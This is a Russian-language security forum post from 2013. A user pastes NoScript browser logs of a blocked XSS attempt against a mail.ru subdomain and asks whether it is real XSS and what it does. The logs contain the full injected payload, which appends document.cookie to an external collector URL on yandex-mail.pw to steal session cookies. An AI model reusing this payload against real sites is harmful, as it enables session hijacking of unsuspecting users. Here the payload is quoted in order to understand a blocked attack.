XSS или не XSS? — ANTICHAT Forum

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

05.12.2013, 13:08

DevilCoder

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 0

Скрин http://i.pixs.ru/storage/8/0/3/xsspng_1640134_9974803.png

Данные с консоли

1 ---

[NoScript InjectionChecker] JavaScript Injection in ///data-mrc-config%22%27%3E%3E%3Cinput%3E%3Cscript%3Eimg.src=l ocation.hash.slice(1)+document.cookie;//**/%3C/script%3E/*%3Cinput%3E%3Cp#http://yandex-mail.pw/sn/s.php?

(function anonymous() {

location.hash.slice(1)+document.cookie /* COMMENT_TERMINATOR */

DUMMY_EXPR

})

2 ---

[NoScript XSS] Отфильтрован подозрительный запрос. URL: [https://krugdoveriya.mail.ru/data-mrc-config%22%27%3E%3E%3Cinput%3E%3Cscript%3Eimg.src=l ocation.hash.slice(1)+document.cookie;//**/%3C/script%3E/*%3Cinput%3E%3Cp#http://yandex-mail.pw/sn/s.php?]. Запрос последовал со страницы: [http://o5sms.ru/]. Отфильтрованный адрес: [https://krugdoveriya.mail.ru/data-mrc-config%20%20%3E%3E%20input%3E%20script%3Eimg.src%2 0LOCATION.hash.slice%201%20+DOCUMENT.COOKIE;//**/%20/script%3E/*%20input%3E%20p#5783861931061425911]

3 ---

krugdoveriya.mail.ru : server does not support RFC 5746, see CVE-2009-3555

Интересно узнать, это реально XSS, или нет, и что она делает, ну хочет сделать?